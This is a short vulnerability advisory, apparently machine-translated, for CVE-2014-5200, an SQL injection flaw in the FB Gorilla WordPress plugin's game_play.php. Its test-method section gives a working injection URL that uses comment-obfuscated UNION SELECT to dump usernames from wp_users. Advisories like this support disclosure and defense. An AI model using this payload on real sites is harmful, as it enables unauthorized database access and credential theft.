WordPress FB Gorilla plugin 'game _ play. php' SQL Injection Vulnerability

WordPress FB Gorilla plugin 'game _ play. php' SQL Injection Vulnerability

Release date:
Updated on:

Affected Systems:
WordPress FB Gorilla
Description:
--------------------------------------------------------------------------------
Bugtraq id: 69222
CVE (CAN) ID: CVE-2014-5200
 
The WordPress FB Gorilla plug-in is an automated system that can publish content on fanpages.
 
In FB Gorilla plugin for WordPress, game_play.php does not effectively filter user input. The SQL injection vulnerability exists in implementation. Remote attackers can exploit this vulnerability to execute arbitrary SQL commands using id parameters.
 
<* Source: Amirh03in
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/wp-content/plugins/fbgorilla/game_play.php? Id =-7 + /*! 50000union */+ /*! 50000select */+ 1, 2, % 28 /*! 50000group_Concat % 28user_login % 29 */% 29,4, 5, 6, 7, 8, 9, 0, 1, 2, 3 + from + wp_users --

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://fbgorilla.net/fb-gorilla-review/
 
This article permanently updates the link address: